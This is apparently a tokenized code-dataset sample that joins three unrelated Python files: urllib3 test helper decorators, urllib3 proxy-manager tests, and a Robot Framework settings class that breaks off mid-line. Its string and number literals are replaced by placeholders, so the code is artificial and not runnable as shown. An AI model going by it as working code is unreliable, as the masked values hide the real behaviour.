( name = test . __name__ ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy279OrNewer ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:9> ) : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy2 ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if six . PY3 : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def onlyPy3 ( test ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( name = test . __name__ ) <EOL> if not six . PY3 : <EOL> raise SkipTest ( msg ) <EOL> return test ( * args , ** kwargs ) <EOL> return wrapper <EOL> def requires_network ( test ) : <EOL> """<STR_LIT>""" <EOL> def _is_unreachable_err ( err ) : <EOL> return getattr ( err , '<STR_LIT>' , None ) in ( errno . ENETUNREACH , <EOL> errno . EHOSTUNREACH ) <EOL> @ functools . wraps ( test ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> msg = "<STR_LIT>" . format ( <EOL> name = test . __name__ ) <EOL> try : <EOL> return test ( * args , ** kwargs ) <EOL> except socket . error as e : <EOL> if _is_unreachable_err ( e ) : <EOL> raise SkipTest ( msg ) <EOL> raise <EOL> except MaxRetryError as e : <EOL> if _is_unreachable_err ( e . reason ) : <EOL> raise SkipTest ( msg ) <EOL> raise <EOL> return wrapper <EOL> class _ListHandler ( logging . Handler ) : <EOL> def __init__ ( self ) : <EOL> super ( _ListHandler , self ) . __init__ ( ) <EOL> self . records = [ ] <EOL> def emit ( self , record ) : <EOL> self . records . append ( record ) <EOL> class LogRecorder ( object ) : <EOL> def __init__ ( self , target = logging . root ) : <EOL> super ( LogRecorder , self ) . __init__ ( ) <EOL> self . _target = target <EOL> self . _handler = _ListHandler ( ) <EOL> @ property <EOL> def records ( self ) : <EOL> return self . _handler . records <EOL> def install ( self ) : <EOL> self . _target . addHandler ( self . _handler ) <EOL> def uninstall ( self ) : <EOL> self . _target . removeHandler ( self . _handler ) <EOL> def __enter__ ( self ) : <EOL> self . install ( ) <EOL> return self . records <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . uninstall ( ) <EOL> return False </s>
<s> import json <EOL> import socket <EOL> import unittest <EOL> from nose . tools import timed <EOL> from dummyserver . testcase import HTTPDummyProxyTestCase , IPv6HTTPDummyProxyTestCase <EOL> from dummyserver . server import ( <EOL> DEFAULT_CA , DEFAULT_CA_BAD , get_unreachable_address ) <EOL> from . . import TARPIT_HOST <EOL> from urllib3 . _collections import HTTPHeaderDict <EOL> from urllib3 . poolmanager import proxy_from_url , ProxyManager <EOL> from urllib3 . exceptions import ( <EOL> MaxRetryError , SSLError , ProxyError , ConnectTimeoutError ) <EOL> from urllib3 . connectionpool import connection_from_url , VerifiedHTTPSConnection <EOL> class TestHTTPProxyManager ( HTTPDummyProxyTestCase ) : <EOL> def setUp ( self ) : <EOL> self . http_url = '<STR_LIT>' % ( self . http_host , self . http_port ) <EOL> self . http_url_alt = '<STR_LIT>' % ( self . http_host_alt , <EOL> self . http_port ) <EOL> self . https_url = '<STR_LIT>' % ( self . https_host , self . https_port ) <EOL> self . https_url_alt = '<STR_LIT>' % ( self . https_host_alt , <EOL> self . https_port ) <EOL> self . proxy_url = '<STR_LIT>' % ( self . proxy_host , self . proxy_port ) <EOL> def test_basic_proxy ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> def test_nagle_proxy ( self ) : <EOL> """<STR_LIT>""" <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> hc2 = http . connection_from_host ( self . http_host , self . http_port ) <EOL> conn = hc2 . _get_conn ( ) <EOL> hc2 . _make_request ( conn , '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> tcp_nodelay_setting = conn . sock . getsockopt ( socket . IPPROTO_TCP , socket . TCP_NODELAY ) <EOL> self . assertEqual ( tcp_nodelay_setting , <NUM_LIT:0> , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" % tcp_nodelay_setting ) ) <EOL> def test_proxy_conn_fail ( self ) : <EOL> host , port = get_unreachable_address ( ) <EOL> http = proxy_from_url ( '<STR_LIT>' % ( host , port ) , retries = <NUM_LIT:1> , timeout = <NUM_LIT> ) <EOL> self . assertRaises ( MaxRetryError , http . request , '<STR_LIT:GET>' , <EOL> '<STR_LIT>' % self . https_url ) <EOL> self . assertRaises ( MaxRetryError , http . request , '<STR_LIT:GET>' , <EOL> '<STR_LIT>' % self . http_url ) <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ProxyError ) <EOL> def test_oldapi ( self ) : <EOL> http = ProxyManager ( connection_from_url ( self . proxy_url ) ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> def test_proxy_verified ( self ) : <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA_BAD ) <EOL> https_pool = http . _new_pool ( '<STR_LIT>' , self . https_host , <EOL> self . https_port ) <EOL> try : <EOL> https_pool . request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except SSLError as e : <EOL> self . assertTrue ( '<STR_LIT>' in str ( e ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % e ) <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA ) <EOL> https_pool = http . _new_pool ( '<STR_LIT>' , self . https_host , <EOL> self . https_port ) <EOL> conn = https_pool . _new_conn ( ) <EOL> self . assertEqual ( conn . __class__ , VerifiedHTTPSConnection ) <EOL> https_pool . request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> http = proxy_from_url ( self . proxy_url , cert_reqs = '<STR_LIT>' , <EOL> ca_certs = DEFAULT_CA ) <EOL> https_fail_pool = http . _new_pool ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' , self . https_port ) <EOL> try : <EOL> https_fail_pool . request ( '<STR_LIT:GET>' , '<STR_LIT:/>' ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except SSLError as e : <EOL> self . assertTrue ( "<STR_LIT>" in str ( e ) ) <EOL> def test_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url } , <EOL> redirect = False ) <EOL> self . assertEqual ( r . status , <NUM_LIT> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url } ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> self . assertEqual ( r . data , b'<STR_LIT>' ) <EOL> def test_cross_host_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> cross_host_location = '<STR_LIT>' % self . http_url_alt <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : cross_host_location } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:0> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError : <EOL> pass <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . http_url_alt } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:1> ) <EOL> self . assertNotEqual ( r . _pool . host , self . http_host_alt ) <EOL> def test_cross_protocol_redirect ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> cross_protocol_location = '<STR_LIT>' % self . https_url <EOL> try : <EOL> http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : cross_protocol_location } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:0> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError : <EOL> pass <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , <EOL> fields = { '<STR_LIT:target>' : '<STR_LIT>' % self . https_url } , <EOL> timeout = <NUM_LIT:1> , retries = <NUM_LIT:1> ) <EOL> self . assertEqual ( r . _pool . host , self . https_host ) <EOL> def test_headers ( self ) : <EOL> http = proxy_from_url ( self . proxy_url , headers = { '<STR_LIT>' : '<STR_LIT:bar>' } , <EOL> proxy_headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url_alt ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host_alt , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . https_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url_alt ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host_alt , self . https_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:POST>' , '<STR_LIT>' % self . http_url ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_url ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . https_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . http_host , self . http_port ) ) <EOL> r = http . request_encode_body ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url , headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % ( self . https_host , self . https_port ) ) <EOL> def test_headerdict ( self ) : <EOL> default_headers = HTTPHeaderDict ( a = '<STR_LIT:b>' ) <EOL> proxy_headers = HTTPHeaderDict ( ) <EOL> proxy_headers . add ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> http = proxy_from_url ( <EOL> self . proxy_url , <EOL> headers = default_headers , <EOL> proxy_headers = proxy_headers ) <EOL> request_headers = HTTPHeaderDict ( baz = '<STR_LIT>' ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url , headers = request_headers ) <EOL> returned_headers = json . loads ( r . data . decode ( ) ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( returned_headers . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> def test_proxy_pooling ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . http_url ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:1> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . http_url_alt ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:1> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . https_url ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:2> ) <EOL> for x in range ( <NUM_LIT:2> ) : <EOL> r = http . urlopen ( '<STR_LIT:GET>' , self . https_url_alt ) <EOL> self . assertEqual ( len ( http . pools ) , <NUM_LIT:3> ) <EOL> def test_proxy_pooling_ext ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> hc1 = http . connection_from_url ( self . http_url ) <EOL> hc2 = http . connection_from_host ( self . http_host , self . http_port ) <EOL> hc3 = http . connection_from_url ( self . http_url_alt ) <EOL> hc4 = http . connection_from_host ( self . http_host_alt , self . http_port ) <EOL> self . assertEqual ( hc1 , hc2 ) <EOL> self . assertEqual ( hc2 , hc3 ) <EOL> self . assertEqual ( hc3 , hc4 ) <EOL> sc1 = http . connection_from_url ( self . https_url ) <EOL> sc2 = http . connection_from_host ( self . https_host , <EOL> self . https_port , scheme = '<STR_LIT>' ) <EOL> sc3 = http . connection_from_url ( self . https_url_alt ) <EOL> sc4 = http . connection_from_host ( self . https_host_alt , <EOL> self . https_port , scheme = '<STR_LIT>' ) <EOL> self . assertEqual ( sc1 , sc2 ) <EOL> self . assertNotEqual ( sc2 , sc3 ) <EOL> self . assertEqual ( sc3 , sc4 ) <EOL> @ timed ( <NUM_LIT:0.5> ) <EOL> def test_https_proxy_timeout ( self ) : <EOL> https = proxy_from_url ( '<STR_LIT>' . format ( host = TARPIT_HOST ) ) <EOL> try : <EOL> https . request ( '<STR_LIT:GET>' , self . http_url , timeout = <NUM_LIT> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ConnectTimeoutError ) <EOL> @ timed ( <NUM_LIT:0.5> ) <EOL> def test_https_proxy_pool_timeout ( self ) : <EOL> https = proxy_from_url ( '<STR_LIT>' . format ( host = TARPIT_HOST ) , <EOL> timeout = <NUM_LIT> ) <EOL> try : <EOL> https . request ( '<STR_LIT:GET>' , self . http_url ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except MaxRetryError as e : <EOL> self . assertEqual ( type ( e . reason ) , ConnectTimeoutError ) <EOL> class TestIPv6HTTPProxyManager ( IPv6HTTPDummyProxyTestCase ) : <EOL> def setUp ( self ) : <EOL> self . http_url = '<STR_LIT>' % ( self . http_host , self . http_port ) <EOL> self . http_url_alt = '<STR_LIT>' % ( self . http_host_alt , <EOL> self . http_port ) <EOL> self . https_url = '<STR_LIT>' % ( self . https_host , self . https_port ) <EOL> self . https_url_alt = '<STR_LIT>' % ( self . https_host_alt , <EOL> self . https_port ) <EOL> self . proxy_url = '<STR_LIT>' % ( self . proxy_host , self . proxy_port ) <EOL> def test_basic_ipv6_proxy ( self ) : <EOL> http = proxy_from_url ( self . proxy_url ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . http_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> r = http . request ( '<STR_LIT:GET>' , '<STR_LIT>' % self . https_url ) <EOL> self . assertEqual ( r . status , <NUM_LIT:200> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import os <EOL> from robot import utils <EOL> from robot . errors import DataError , FrameworkError <EOL> from robot . output import LOGGER , loggerhelper <EOL> class _BaseSettings ( object ) : <EOL> _cli_opts = { '<STR_LIT:Name>' : ( '<STR_LIT:name>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT:test>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , utils . abspath ( '<STR_LIT:.>' ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , - <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , False ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) } <EOL> _output_opts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , options = None , log = True ) : <EOL> self . _opts = { } <EOL> self . _cli_opts = self . _cli_opts . copy ( ) <EOL> self . _cli_opts . update ( self . _extra_cli_opts ) <EOL> self . _process_cli_opts ( options or { } , log ) <EOL> if log : LOGGER . info ( '<STR_LIT>' % unicode ( self ) ) <EOL> def _process_cli_opts ( self , opts , log ) : <EOL> for name , ( cli_name , default ) in self . _cli_opts . items ( ) : <EOL> value = opts . get ( cli_name , default ) <EOL> if value in [ None , [ ] ] : <EOL> value = default <EOL> elif default == [ ] and isinstance ( value , basestring ) : <EOL> value = [ value ] <EOL> self [ name ] = self . _process_value ( name , value , log ) <EOL> def __setitem__ ( self , name , value ) : <EOL> if name not in self . _cli_opts : <EOL> raise KeyError ( "<STR_LIT>" % name ) <EOL> self . _opts [ name ] = value <EOL> def _process_value ( self , name , value , log ) : <EOL> if name == '<STR_LIT>' : <EOL> return self . _process_log_level ( value ) <EOL> if value == self . _get_default_value ( name ) : <EOL> return value <EOL> if name in [ '<STR_LIT:Name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if name == '<STR_LIT>' : value = self . _escape ( value ) <EOL> return value . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if name == '<STR_LIT>' : value = [ self . _escape ( v ) for v in value ] <EOL> return [ self . _process_metadata_or_tagdoc ( v ) for v in value ] <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ v . replace ( '<STR_LIT>' , '<STR_LIT:&>' ) . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) for v in value ] <EOL> if name in self . _output_opts and utils . eq ( value , '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> if name == '<STR_LIT>' : <EOL> return utils . abspath ( value ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _convert_to_positive_integer_or_default ( name , value ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return [ self . _split_args_from_name_or_path ( item ) for item in value ] <EOL> if name == '<STR_LIT>' : <EOL> return self . _process_report_background ( value ) <EOL> if name == '<STR_LIT>' : <EOL> return [ self . _process_tag_stat_combine ( v ) for v in value ] <EOL> if name == '<STR_LIT>' : <EOL> return [ v for v in [ self . _process_tag_stat_link ( v ) for v in value ] if v ] <EOL> if name == '<STR_LIT>' : <EOL> return [ v . upper ( ) for v in value ] <EOL> return value <EOL> def _process_log_level ( self , level ) : <EOL> level , visible_level = self . _split_log_level ( level . upper ( ) ) <EOL> self . _opts [ '<STR_LIT>' ] = visible_level <EOL> return level <EOL> def _split_log_level ( self , level ) : <EOL> if '<STR_LIT::>' in level : <EOL> level , visible_level = level . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> else : <EOL> visible_level = level <EOL> self . _validate_log_level_and_default ( level , visible_level ) <EOL> return level , visible_level <EOL> def _validate_log_level_and_default ( self , log_level , default ) : <EOL> if log_level not in loggerhelper . LEVELS : <EOL> raise DataError ( "<STR_LIT>" % log_level ) <EOL> if default not in loggerhelper . LEVELS : <EOL> raise DataError ( "<STR_LIT>" % default ) <EOL> if not loggerhelper . IsLogged ( log_level ) ( default ) : <EOL> raise DataError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( default , log_level ) ) <EOL> def __getitem__ ( self , name ) : <EOL> if name not in self . _opts : <EOL> raise KeyError ( "<STR_LIT>" % name ) <EOL> if name in self . _output_opts : <EOL> return self . _get_output_file ( name ) <EOL> return self . _opts [ name ] <EOL> def _get_output_file ( self , type_ ) : <EOL> """<STR_LIT>""" <EOL> name = self . _opts [ type_ ] <EOL> if self . _outputfile_disabled ( type_ , name ) : <EOL> return '<STR_LIT>' <EOL> name = self . _process_output_name ( name , type_ ) <EOL> path = utils . abspath ( os . path . join ( self [ '<STR_LIT>' ] , name ) ) <EOL> self . _create_output_dir ( os . path . dirname ( path ) , type_ ) <EOL> return path <EOL> def _process_output_name ( self , name , type_ ) : <EOL> base , ext = os . path . splitext ( name ) <EOL> if self [ '<STR_LIT>' ] : <EOL> base = '<STR_LIT>' % ( base , utils . get_start_timestamp ( '<STR_LIT>' , '<STR_LIT:->' , '<STR_LIT>' ) ) <EOL> ext = self . _get_output_extension ( ext , type_ ) <EOL> return base + ext <EOL> def _get_output_extension ( self , ext , type_ ) : <EOL> if ext != '<STR_LIT>' : <EOL> return ext <EOL> if type_ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return '<STR_LIT>' <EOL> if type_ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return '<STR_LIT>' <EOL> if type_ == '<STR_LIT>' : <EOL> return '<STR_LIT>' <EOL> raise FrameworkError ( "<STR_LIT>" % type_ ) <EOL> def _create_output_dir ( self , path , type_ ) : <EOL> try : <EOL> if not os . path . exists ( path ) : <EOL> os . makedirs ( path ) <EOL> except EnvironmentError , err : <EOL> raise DataError ( "<STR_LIT>" <EOL> % ( type_ . lower ( ) , path , err . strerror ) ) <EOL> def _process_metadata_or_tagdoc ( self , value ) : <EOL> value = value . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> if '<STR_LIT::>' in value : <EOL> return value . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return value , '<STR_LIT>' <EOL> def _process_report_background ( self , colors ) : <EOL> if colors . count ( '<STR_LIT::>' ) not in [ <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> LOGGER . error ( "<STR_LIT>" % colors ) <EOL> return self . _get_default_value ( '<STR_LIT>' ) <EOL> colors = colors . split ( '<STR_LIT::>' ) <EOL> if len ( colors ) == <NUM_LIT:2> : <EOL> return colors [ <NUM_LIT:0> ] , colors [ <NUM_LIT:0> ] , colors [ <NUM_LIT:1> ] <EOL> return tuple ( colors ) <EOL> def _process_tag_stat_combine ( self , value ) : <EOL> for replwhat , replwith in [ ( '<STR_LIT:&>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] : <EOL> value = value . replace ( replwhat , replwith ) <EOL> if '<STR_LIT::>' not in value : <EOL> return value , '<STR_LIT>' <EOL> pattern , title = value . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return pattern , title . replace ( '<STR_LIT:_>' , '<STR_LIT:U+0020>' ) <EOL> def _process_tag_stat_link ( self , value ) : <EOL> tokens = value . split ( '<STR_LIT::>' ) <EOL> if len ( tokens ) >= <NUM_LIT:3> : <EOL> return tokens [ <NUM_LIT:0> ] , '<STR_LIT::>' . join ( tokens [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) , tokens [ - <NUM_LIT:1> ] <EOL> LOGGER . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % value ) <EOL> return None <EOL> def _convert_to_positive_integer_or_default ( self , name , value ) : <EOL> value = self . _convert_to_integer ( name , value ) <EOL> return value if value > <NUM_LIT:0> else self . _get_default_value ( name ) <EOL> def _convert_to_integer ( self , name , value ) : <EOL> try : <EOL> return int ( value ) <EOL> except ValueError : <EOL> LOGGER . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( name . lower ( ) , value ) ) <EOL> return self . _get_default_value ( name ) <EOL> def _get_default_value ( self , name ) : <EOL> return self . _cli_opts [ name ] [ <NUM_LIT:1> ] <EOL> def _split_args_from_name_or_path ( self , name ) : <EOL> if '<STR_LIT::>' not in name or os . path . exists ( name ) : <EOL> args = [ ] <EOL> else : <EOL> args = name . split ( '<STR_LIT::>' ) <EOL> name = args . pop ( <NUM_LIT:0> ) <EOL> if len ( name ) == <NUM_LIT:1> and args [ <NUM_LIT:0> ] . startswith ( ( '<STR_LIT:/>' , 